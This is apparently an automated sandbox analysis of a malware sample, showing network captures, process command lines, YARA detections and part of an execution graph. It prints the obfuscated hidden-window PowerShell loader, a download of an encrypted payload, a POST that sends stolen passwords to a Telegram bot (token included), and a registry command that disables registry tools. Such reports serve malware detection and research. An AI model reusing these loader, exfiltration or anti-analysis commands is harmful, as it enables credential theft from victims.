    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49819 | 142.250.181.1 | 443 | 5064 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 11:06:08 UTC | 258 | OUT | GET /download?id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
2024-12-17 11:06:11 UTC | 4930 | IN | HTTP/1.1 200 OK
    X-GUploader-UploadID: AFiumC7k4TKhR2CEK56jcccJkK3-W1csLBWmteZ_1aGcK_Wegza0IZxCphRAAmcUGGZEfwmw
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="hsISdySQ90.bin"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 93760
    Last-Modified: Tue, 19 Nov 2024 20:10:07 GMT
    Date: Tue, 17 Dec 2024 11:06:11 GMT
    Expires: Tue, 17 Dec 2024 11:06:11 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=irNcaA==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close
2024-12-17 11:06:11 UTC | 4930 | IN | Data Raw: 1b d9 0e d9 fc 81 5a 63 a1 ed 7b 3d fd c3 c1 14 e5 83 a5 92 05 6a 71 5a fe 30 d3 74 5b 32 2f 8d 8b 45 2c a8 9e b8 00 a6 aa ca d1 3a b1 8e ab c3 e2 35 24 91 ba 26 f4 a8 36 24 f3 e1 62 97 16 5b ff ae b3 42 6c c8 3f 9d 05 cc 98 e6 2e 0c 67 7d f2 1b 71 72 13 81 c3 c6 3d 0b 5b 0a b8 28 67 7d 08 62 da 33 e4 8d e4 ab aa 1a c3 ae 56 b6 ad 7f 74 f6 f8 0d 33 10 9b 50 71 72 82 82 2e 6b 5d 3e 8e 43 06 24 2b a2 c3 c6 90 4c 1c 00 12 62 88 a3 19 5d bb ca 20 1a a5 09 aa b1 e6 7a 41 a1 ce b6 4d e7 c2 63 ef 7a d2 87 3b 4f e7 63 7a e3 09 fb 63 58 91 2b 73 60 bb b7 10 fa 5f a6 4f 71 d3 34 0d f4 9d ec 86 0d e7 e4 27 b0 11 d7 a1 fb f1 f0 42 da 87 e8 2e 49 b0 51 23 e3 78 a7 67 39 85 bd 47 27 91 eb 2f c7 6e 08 a4 41 8a 71 47 00 31 df 3c 8b 8b 8f 10 48 02 e5 d2 bc 46 f5 17 62 2d
    Data Ascii: Zc{=jqZ0t[2/E,:5$&6$b[Bl?.g}qr=[(g}b3Vt3Pqr.k]>C$+Lb] zAMcz;OczcX+s`_Oq4'B.IQ#xg9G'/nAqG1<HFb-
2024-12-17 11:06:11 UTC | 4840 | IN | Data Raw: dc 48 a6 89 ee 66 9f e9 92 34 5a cd ad b5 be 12 a2 8f aa d0 4b 47 f1 a3 01 fe c8 49 c8 78 e3 f9 2c ef d1 79 92 08 67 23 86 ac 64 5d e8 7d 4b 5c 3c 4f 04 ac 55 01 12 a9 52 26 0b 46 39 1f 8c 57 88 dd c6 d4 04 4b b8 59 94 c1 f3 12 80 97 38 29 56 3e 73 4f 5a 27 06 6c d2 9e f0 0b ec 64 5b 96 9d 9c 4d b7 8a c0 50 5f 90 3e e7 6e 42 92 a7 ac 1d 27 16 bd 5b a8 5e 3a 76 f9 d7 29 40 a9 55 57 00 94 59 5f 38 75 cd e0 cc 13 15 0e 41 a9 db 49 6a 62 07 13 b3 4a f6 06 d4 71 29 7e 5c 11 81 a8 e2 70 b6 be 5b e4 30 25 d4 2d a8 59 30 65 25 63 cc c0 ec b0 55 4b 29 00 67 65 43 fe 6b 2c f9 8c d0 31 06 4b bf 42 cb c8 4e b9 9f bd 25 2e 62 a0 cb c1 e9 3c bd 22 e4 c4 6d b6 ae 39 f2 12 aa 30 79 61 d5 c9 f9 ca 2b 50 0d 77 f0 33 cc 50 dc 57 09 cc d8 57 f8 52 23 04 4a 2f a6 6c d2 3f 9b
    Data Ascii: Hf4ZKGIx,yg#d]}K\<OUR&F9WKY8)V>sOZ'ld[MP_>nB'[^:v)@UWY_8uAIjbJq)~\p[0%-Y0e%cUK)geCk,1KBN%.b<"m90ya+Pw3PWWR#J/l?
2024-12-17 11:06:11 UTC | 1320 | IN | Data Raw: 6c 8d b6 b4 4d 0d 27 0d 6f 4c 0a 71 aa 47 89 21 4a 7c 41 8f aa f8 5e a9 3b 34 82 f7 a9 00 a8 d1 19 93 01 0a 6f 47 e3 7c e0 85 25 9d ac 6f e1 0a 4c 3e 6d 7a f2 d3 86 9d 20 ac 4b 4e b6 32 fa 4d 5e 31 dd 6b 10 8b 4f 94 c2 9f b3 21 56 f6 ba 59 38 c4 49 3d 60 3d 77 76 6e 83 f5 94 e7 41 a3 1c 58 0d 43 ba 7b f5 b9 8b 45 c6 63 28 0f 14 59 36 e6 17 ab ee bd e6 a7 48 ac 03 a8 06 ea a5 9e 87 35 67 ba c2 ce b4 cc 7f db 86 1a f0 c4 d3 d0 b1 07 d3 a6 e2 19 9d ac 2e d1 88 00 0b a9 15 50 5c 94 6f c1 a1 86 3b f5 2d e8 ee f6 11 7b f3 d3 c3 df 0c 1c e0 e1 c1 05 a6 15 6b 9b b0 a5 8f 6d 59 2d 7e 4d e9 14 4b 66 f2 80 40 9c 6a d4 09 f6 23 db 8b 27 c7 06 d0 cd 70 85 8b 34 8f dd a3 9d 22 05 aa 98 39 74 84 c6 29 d3 dc 61 e3 cf 23 9d 81 94 8b 11 19 62 6e 1a d2 a9 d3 5a 6f 0b 18 28
    Data Ascii: lM'oLqG!J|A^;4oG|%oL>mz KN2M^1kO!VY8I=`=wvnAXC{Ec(Y6H5g.P\o;-{kmY-~MKf@j#'p4"9t)a#bnZo(
2024-12-17 11:06:11 UTC | 1390 | IN | Data Raw: cb 2e 07 82 8a 38 53 c1 3e 02 57 5a 27 02 05 b4 9f f0 31 f9 4c da ba 9d 96 4a 49 f8 04 55 4e 9f 0c e6 e2 7d 92 a7 de b4 31 64 5d 5d ae 3f 9e 2d f0 a5 2f 52 da a8 f5 25 86 44 f3 2e 75 b7 42 f8 0c 08 bf 57 a9 a1 95 47 76 14 13 c6 57 65 06 de 70 1d 6e 0a 5c 81 a8 e2 70 9c a3 5b e4 77 ce d4 2d a4 94 28 72 5b b5 e4 87 e6 c2 52 33 bb 70 08 b2 43 ef 67 fc d8 93 ae 9d 78 56 b5 30 cb a2 dc c2 f0 10 0d 69 68 02 e4 b7 04 e0 bd 28 ee c8 c8 ae ae 4d ee 5b aa 30 79 d0 c1 df ee a2 ad 58 1b 6e e8 0c 02 c4 dc 57 12 c4 b7 7e 62 41 2d 66 d7 3b 58 65 d2 3c f4 fa 0c 0e d6 70 b7 06 1f 91 f1 f6 9d b9 9c 34 ed 24 e6 9b cd 3b 1c 53 79 86 aa a8 34 bd 71 c9 eb 34 3a 97 08 cb bd 39 cb d8 e4 d1 0b 5f 14 1b 92 d8 22 b8 f5 f4 69 92 63 1a 02 97 12 de 58 3e 18 fc 2f 01 73 3b e6 c2 e9 9d
    Data Ascii: .8S>WZ'1LJIUN}1d]]?-/R%D.uBWGvWepn\p[w-(r[R3pCgxV0ih(M[0yXnW~bA-f;Xe<p4$;Sy4q4:9_"icX>/s;
2024-12-17 11:06:11 UTC | 1390 | IN | Data Raw: 69 6a 55 2d ab de 6a b4 0d bc 83 89 ab d5 3b f7 31 b3 fd c2 ef fd f9 e0 3f 60 62 b1 a2 74 d3 29 06 a8 bc 12 8d 82 59 95 3c 20 5d c9 0d 61 d3 08 c7 3e d0 aa 5b bb 20 fe c4 4c ec ed 96 f6 8d d4 7e d6 89 0a 17 80 ac 64 bc a9 e1 86 20 3a 78 f9 c4 e8 40 27 68 21 17 05 9c ca 9f 4d d6 ba 72 70 26 aa 1e b2 89 1f 1b 2c 62 18 b7 83 56 5a e2 45 05 b3 9b 6e 0b 22 43 0c 6b ae aa 88 92 ae c3 bb 6c ba ec 2f 5c 72 9f ac ad 7f 52 95 c9 64 24 6a d1 1f 07 c8 ee dc 1c dd 36 6b bd 87 df 3b 8c 2b 54 00 4e 23 0a c1 44 d8 d2 12 ad a2 33 bd 4f 0b 96 06 65 ac 27 1f 97 74 68 71 d3 8e ab cf a8 25 fc 31 0b 24 45 28 29 8a e9 5b cb 00 02 d8 c4 33 1f 35 e4 02 e0 12 5c ef 7e ad e4 2e 8c 2f 1f 58 26 27 21 06 94 63 10 fc 03 49 fa e1 3e 54 43 00 55 b6 a5 3b 1a 7d 43 5c 05 64 8e cf 7f 36 40
    Data Ascii: ijU-j;1?`bt)Y< ]a>[ L~d :x@'h!Mrp&,bVZEn"Ckl/\rRd$j6k;+TN#D3Oe'thq%1$E()[35\~./X&'!cI>TCU;}C\d6@
2024-12-17 11:06:11 UTC | 1390 | IN | Data Raw: 25 9f dd 0f db 0a 48 4a 2d 73 e3 d0 da 56 20 ac 40 51 b4 30 f6 33 a3 1d d0 63 78 c8 5e 9f d5 bb 73 2d 7a e5 ab 53 57 3a 32 71 6a 2a 1c f5 3d 83 ff f1 31 15 a3 16 7a 6a 4a a9 76 e8 be a7 48 d5 10 0b 8f 14 5d 14 24 1a ba e9 90 56 79 75 bd 0b c6 27 e0 a5 b5 aa 38 76 97 b7 df a5 cc 7c ca ba 1a f0 ca ad 32 b9 89 be c3 01 0e 47 bf d0 d5 d1 00 0d a3 04 50 57 9d 7c ee 3d 8e b5 9a 3b 20 c2 94 14 75 fc fb 40 ce 0b 0e f6 d8 20 16 a0 1d 7f b7 e6 85 aa 43 7d f7 69 91 77 43 4b 77 fd fc b8 8a 79 d6 29 f8 26 d5 85 a9 ba 07 d0 f4 25 94 8c b0 38 c9 b5 8f 3b 17 88 32 39 72 a8 d5 20 c3 c9 77 1d ce 30 d0 90 c3 3c 1c 1f 6f 42 0d a0 4e c3 81 1f 14 f8 a4 04 dc da bb 9e c4 13 f0 af 05 64 66 ad fa 61 53 de 33 d0 e9 11 53 b4 20 6e ff 77 a2 08 1f 55 4b 7e 48 54 4e a4 4d fc 59 e7 84
    Data Ascii: %HJ-sV @Q03cx^s-zSW:2qj*=1zjJvH]$Vyu'8v|2GPW|=; u@ C}iwCKwy)&%8;29r w0<oBNdfaS3S nwUK~HTNMY
2024-12-17 11:06:11 UTC | 1390 | IN | Data Raw: 69 50 eb 65 4f fa f9 6c 5d 78 26 d0 97 cf ba da a1 9a dc 08 41 f1 a0 c1 a8 69 34 ac 20 c8 f9 79 9e af 3c 81 8c c5 32 72 72 d8 b7 fc a4 be 5a 25 e9 e1 34 a5 d5 d5 46 0a d8 58 76 eb 58 36 7d cb d1 a7 75 ca 26 ee dd 23 a2 7e 70 b7 1d 04 fb 40 a9 9d b3 85 29 f2 1f 7e a3 ac 3f 0f 56 68 8a bb 8e 8e ae 57 63 fa 3e 21 91 76 11 cf 85 dd cb 9b cd 01 5f 14 17 ee 97 33 b7 8d b6 cc 92 13 73 f1 92 12 c5 48 b2 f9 e8 20 03 8f 06 67 b2 86 77 ca 4e aa ff d3 cb b7 28 70 50 af e4 3c 46 05 10 16 45 96 18 f6 a8 d2 e1 25 0f ff 73 4f 63 3b 34 58 fc ae d4 85 ed bf 99 ac 9f 8d f5 6e 71 44 c0 0f e9 72 d8 c4 b0 c0 9a 06 a8 18 72 c6 cd a9 37 50 0a 69 05 9a 4e c6 52 f7 7e 19 8b ea a0 a6 98 45 ac 71 c1 95 a4 7f 5d 91 e2 46 10 f3 83 4d 6f 4d 7b 15 99 ee 0f 13 4b d2 f0 d7 e4 24 d5 80 c6
                                                                                                  Data Ascii: iPeOl]x&Ai4 y<2rrZ%4FXvX6}u&#~p@)~?VhWc>!v_3sH gwN(pP<FE%sOc;4XnqDrr7PiNR~Eq]FMoM{K$
                                                                                                  2024-12-17 11:06:11 UTC1390INData Raw: 1e a4 f6 9d 10 30 2c 32 80 2f aa 82 b0 f6 3d b8 77 ac 88 bf bb 77 ef ca 96 de 43 83 b1 d0 c0 69 fe 63 fa d9 e2 fa 7c ce aa 42 cf 35 c4 1e ea 36 a3 15 4e 59 83 e5 44 c2 51 26 94 c3 5d b9 6d 57 5b 32 67 a2 2a 6b a1 4d 0b 0f d0 70 da 7e a9 2f c9 27 8c 10 7c 76 60 bb f2 33 bf 3b 81 d8 c4 12 2b 29 ba 1e c6 03 4c ef 50 14 82 ec 8c 25 95 44 39 36 03 14 8b 5a d4 eb d5 50 d5 be 39 45 4f 2d 95 59 79 d3 cc 6e be 4c 31 58 ac ec ee 23 73 4c 06 83 45 86 74 ba 87 ed 05 c9 51 3a e0 2e 06 d5 6b 36 49 d3 d1 1c 10 6d c6 bf 35 d7 9e e2 5d f4 44 3b 27 37 ce 53 b8 5a 9c 6f 14 0f d5 a4 df b3 45 5e 7e 91 15 1a 62 90 35 ee f1 fd 46 63 7f e5 1e 12 da 69 23 8c ab 1e d0 2a 5c 1a 06 e8 de 6b dc d2 fc 60 2b aa 37 82 13 e3 e6 da a8 60 51 9f 32 4d 9e 1f 90 3e 76 13 92 6f fe eb af ac 7e
                                                                                                  Data Ascii: 0,2/=wwCic|B56NYDQ&]mW[2g*kMp~/'|v`3;+)LP%D96ZP9EO-YynL1X#sLEtQ:.k6Im5]D;'7SZoE^~b5Fci#*\k`+7`Q2M>vo~
                                                                                                  2024-12-17 11:06:11 UTC1390INData Raw: 06 33 42 e9 a8 a0 86 6d 37 3b a3 13 c0 20 fa e0 e1 1a 75 de a9 40 df 06 c4 e0 f0 ef 57 bc 17 6c b3 38 a5 8f 78 4e f7 69 cc 65 4d 4b 0c f2 93 47 9a 79 dc 01 bc 27 d5 8e b2 9e 10 d4 a0 76 94 8c 89 e6 c9 a4 8f 35 0f aa cf 39 74 88 a7 73 e1 d5 07 35 82 30 97 9a 94 98 1a 20 99 42 0d aa 45 c4 63 59 1b 11 a4 22 eb 0d bb 9f d9 2f ff dd bb 78 66 dd a7 b3 53 cf 35 e9 ed f3 d9 b4 20 69 e3 af a8 09 1f 59 40 6e 39 55 4e ae 45 ed 5c 1b 65 63 a4 60 d3 a8 54 98 12 7c 92 d1 24 ad 4b fd 14 09 7f a3 74 3c 7a 06 9a 2d 52 6a 8d 87 f0 d3 5f ea 68 2b 57 d5 9f 4b d3 05 a5 93 93 a5 9e 5b 3d 8b d8 14 01 25 3b 48 33 aa 03 da 5c a3 52 17 38 82 dd 33 05 90 61 a1 08 79 10 cc be ac a3 81 e4 cc bd 2a e9 d8 23 7b 21 ec 54 28 53 fe 43 4d d1 8a 17 d9 37 44 0f 85 e4 13 f9 b7 b6 33 51 1d c3
                                                                                                  Data Ascii: 3Bm7; u@Wl8xNieMKGy'v59ts50 BEcY"/xfS5 iY@n9UNE\ec`T|$Kt<z-Rj_h+WK[=%;H3\R83ay*#{!T(SCM7D3Q
                                                                                                  2024-12-17 11:06:11 UTC1390INData Raw: b4 c7 58 2c 06 80 c8 33 bf 96 99 02 1a 0f 75 92 f8 c7 d4 4c c6 16 e5 31 74 eb b0 fa b2 f6 12 09 b0 a9 e8 c5 bd 5d 3c 77 52 05 d0 bd 36 6a cf 00 bb 93 54 e0 b5 c6 c5 9a 42 e2 f8 63 6b 2a 3d 51 a9 da fa 91 ec cf 31 e6 8a 85 57 41 06 35 8d 1a e3 2a ee e1 a9 d7 8d ad 9c 0b 14 5e d9 ba 4d e3 25 64 ea 9e ff e8 5f 8e 54 11 a3 30 02 8e 32 54 a9 14 8d 98 da 7a 4c 98 ce c2 1d db cb 5e 6a 47 fb 1a b2 ce 0b 3b e1 c3 f7 ca 3a 26 d5 e3 7d 19 78 ca 00 51 e6 db 22 9e 73 e3 a8 7c 73 fa b6 53 fe 3e 43 e3 cb f7 6c c6 70 39 69 a1 f2 71 b6 63 3e d2 99 00 8d 48 92 0b 23 14 32 73 81 8b 93 02 f9 43 5c e2 95 9a f3 42 50 32 3b 28 7d a9 92 bd c8 13 19 90 ef 6b d2 f9 19 53 a2 ea 12 65 7b 97 71 fa 01 0e 5c 82 1c d6 e9 a3 09 23 3b b1 44 f2 ae dd 38 9e 53 95 8f 5a 8c 50 fc c8 42 d7 e4
                                                                                                  Data Ascii: X,3uL1t]<wR6jTBck*=Q1WA5*^M%d_T02TzL^jG;:&}xQ"s|sS>Clp9iqc>H#2sC\BP2;(}kSe{q\#;D8SZPB


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
2          | 192.168.2.5 | 49867       | 149.154.167.220 | 443              | 5064 | C:\Windows\SysWOW64\msiexec.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-17 11:06:28 UTC | 296               | OUT       | POST /bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd1e60f09a017a
Host: api.telegram.org
Content-Length: 1077
Connection: Keep-Alive
2024-12-17 11:06:28 UTC | 1077              | OUT       | Data (ASCII, line breaks restored from the raw bytes):
--===============8dd1e60f09a017a
Content-Disposition: form-data; name="document"; filename="Userdata.txt"
Content-Type: application/x-ms-dos-executable



************************************************************
*
2024-12-17 11:06:29 UTC | 388               | IN        | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 17 Dec 2024 11:06:28 GMT
Content-Type: application/json
Content-Length: 540
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 11:06:29 UTC | 540               | IN        | Data (ASCII):
{"ok":true,"result":{"message_id":5084,"from":{"id":7559875433,"is_bot":true,"first_name":"gtzzzz","username":"gtzzzz_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734433588,"document":{"file_name



Target ID: 0
Start time: 06:04:55
Start date: 17/12/2024
Path: C:\Users\user\Desktop\dP5z8RpEyQ.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\dP5z8RpEyQ.exe"
Imagebase: 0x400000
File size: 841'568 bytes
MD5 hash: 307B33A50DCDA8511F357C5DE9DA6B02
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 06:04:55
Start date: 17/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) "
Imagebase: 0x9a0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2638733328.000000000B5D3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 3
Start time: 06:04:56
Start date: 17/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 06:05:54
Start date: 17/12/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\msiexec.exe"
Imagebase: 0x780000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 7
Start time: 06:06:19
Start date: 17/12/2024
Path: C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit): true
Commandline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
Imagebase: 0x900000
File size: 59'392 bytes
MD5 hash: CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 06:06:19
Start date: 17/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 22.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 16.9%
Total number of Nodes: 1335
Total number of Limit Nodes: 33
40471e CoTaskMemFree 4118->4121 4122 4047ac 4119->4122 4124 404685 4120->4124 4125 405a6c 3 API calls 4121->4125 4162 4060d4 lstrcpynA 4122->4162 4123->4107 4160 40418d SendMessageA 4124->4160 4127 40472b 4125->4127 4130 404762 SetDlgItemTextA 4127->4130 4134 406167 17 API calls 4127->4134 4129 40468b 4133 4064dd 5 API calls 4129->4133 4130->4104 4131 4047c3 4132 4064dd 5 API calls 4131->4132 4135 4047ca 4132->4135 4133->4108 4136 40474a lstrcmpiA 4134->4136 4137 404806 4135->4137 4145 405ab3 2 API calls 4135->4145 4146 40485e 4135->4146 4136->4130 4138 40475b lstrcatA 4136->4138 4163 4060d4 lstrcpynA 4137->4163 4138->4130 4140 40480d 4141 405b05 4 API calls 4140->4141 4142 404813 GetDiskFreeSpaceA 4141->4142 4144 404837 MulDiv 4142->4144 4142->4146 4144->4146 4145->4135 4147 4048cf 4146->4147 4149 404a66 20 API calls 4146->4149 4148 4048f2 4147->4148 4150 40140b 2 API calls 4147->4150 4164 40417a KiUserCallbackDispatcher 4148->4164 4151 4048bc 4149->4151 4150->4148 4152 4048d1 SetDlgItemTextA 4151->4152 4153 4048c1 4151->4153 4152->4147 4155 4049a1 20 API calls 4153->4155 4155->4147 4156 40490e 4156->4157 4158 404543 SendMessageA 4156->4158 4157->4110 4158->4157 4159->4105 4160->4129 4161->4114 4162->4131 4163->4140 4164->4156 4165 40216b 4166 402bce 17 API calls 4165->4166 4167 402172 4166->4167 4168 402bce 17 API calls 4167->4168 4169 40217c 4168->4169 4170 402bce 17 API calls 4169->4170 4171 402186 4170->4171 4172 402bce 17 API calls 4171->4172 4173 402193 4172->4173 4174 402bce 17 API calls 4173->4174 4175 40219d 4174->4175 4176 4021df CoCreateInstance 4175->4176 4177 402bce 17 API calls 4175->4177 4180 4021fe 4176->4180 4182 4022ac 4176->4182 4177->4176 4178 401423 24 API calls 4179 4022e2 4178->4179 4181 40228c MultiByteToWideChar 4180->4181 4180->4182 4181->4182 4182->4178 4182->4179 4183 4022eb 4184 402bce 17 API calls 4183->4184 4185 4022f1 4184->4185 4186 402bce 17 API calls 4185->4186 4187 4022fa 4186->4187 4188 402bce 17 API calls 4187->4188 4189 
402303 4188->4189 4190 406448 2 API calls 4189->4190 4191 40230c 4190->4191 4192 402310 4191->4192 4193 40231d lstrlenA lstrlenA 4191->4193 4195 4051fb 24 API calls 4192->4195 4197 402318 4192->4197 4194 4051fb 24 API calls 4193->4194 4196 402359 SHFileOperationA 4194->4196 4195->4197 4196->4192 4196->4197 4198 40236d 4199 402387 4198->4199 4200 402374 4198->4200 4201 406167 17 API calls 4200->4201 4202 402381 4201->4202 4203 4057f0 MessageBoxIndirectA 4202->4203 4203->4199 4204 40266d 4205 402bac 17 API calls 4204->4205 4207 402677 4205->4207 4206 405ce5 ReadFile 4206->4207 4207->4206 4208 4026e7 4207->4208 4210 4026f7 4207->4210 4211 4026e5 4207->4211 4213 406032 wsprintfA 4208->4213 4210->4211 4212 40270d SetFilePointer 4210->4212 4212->4211 4213->4211 4214 4019ed 4215 402bce 17 API calls 4214->4215 4216 4019f4 4215->4216 4217 402bce 17 API calls 4216->4217 4218 4019fd 4217->4218 4219 401a04 lstrcmpiA 4218->4219 4220 401a16 lstrcmpA 4218->4220 4221 401a0a 4219->4221 4220->4221 4222 40296e 4223 402bac 17 API calls 4222->4223 4224 402974 4223->4224 4225 4029af 4224->4225 4226 4027bf 4224->4226 4228 402986 4224->4228 4225->4226 4227 406167 17 API calls 4225->4227 4227->4226 4228->4226 4230 406032 wsprintfA 4228->4230 4230->4226 3623 40156f 3624 401586 3623->3624 3625 40157f ShowWindow 3623->3625 3626 401594 ShowWindow 3624->3626 3627 402a5a 3624->3627 3625->3624 3626->3627 4231 40516f 4232 405193 4231->4232 4233 40517f 4231->4233 4234 40519b IsWindowVisible 4232->4234 4238 4051b2 4232->4238 4235 405185 4233->4235 4236 4051dc 4233->4236 4234->4236 4237 4051a8 4234->4237 4240 4041a4 SendMessageA 4235->4240 4239 4051e1 CallWindowProcA 4236->4239 4241 404aab 5 API calls 4237->4241 4238->4239 4243 404b2b 4 API calls 4238->4243 4242 40518f 4239->4242 4240->4242 4241->4238 4243->4236 4244 4014f4 SetForegroundWindow 4245 402a5a 4244->4245 3628 402476 3629 402bce 17 API calls 3628->3629 3630 402488 3629->3630 3631 402bce 17 API calls 3630->3631 3632 402492 3631->3632 3645 
402c5e 3632->3645 3635 402a5a 3636 4024c7 3638 4024d3 3636->3638 3640 402bac 17 API calls 3636->3640 3637 402bce 17 API calls 3639 4024c0 lstrlenA 3637->3639 3641 4024f5 RegSetValueExA 3638->3641 3642 4030d8 31 API calls 3638->3642 3639->3636 3640->3638 3643 40250b RegCloseKey 3641->3643 3642->3641 3643->3635 3646 402c79 3645->3646 3649 405f88 3646->3649 3650 405f97 3649->3650 3651 405fa2 RegCreateKeyExA 3650->3651 3652 4024a2 3650->3652 3651->3652 3652->3635 3652->3636 3652->3637 4246 402777 4247 40277d 4246->4247 4248 402781 FindNextFileA 4247->4248 4251 402793 4247->4251 4249 4027d2 4248->4249 4248->4251 4252 4060d4 lstrcpynA 4249->4252 4252->4251 4253 401ef9 4254 402bce 17 API calls 4253->4254 4255 401eff 4254->4255 4256 402bce 17 API calls 4255->4256 4257 401f08 4256->4257 4258 402bce 17 API calls 4257->4258 4259 401f11 4258->4259 4260 402bce 17 API calls 4259->4260 4261 401f1a 4260->4261 4262 401423 24 API calls 4261->4262 4263 401f21 4262->4263 4270 4057b6 ShellExecuteExA 4263->4270 4265 401f5c 4266 406552 5 API calls 4265->4266 4268 4027bf 4265->4268 4267 401f76 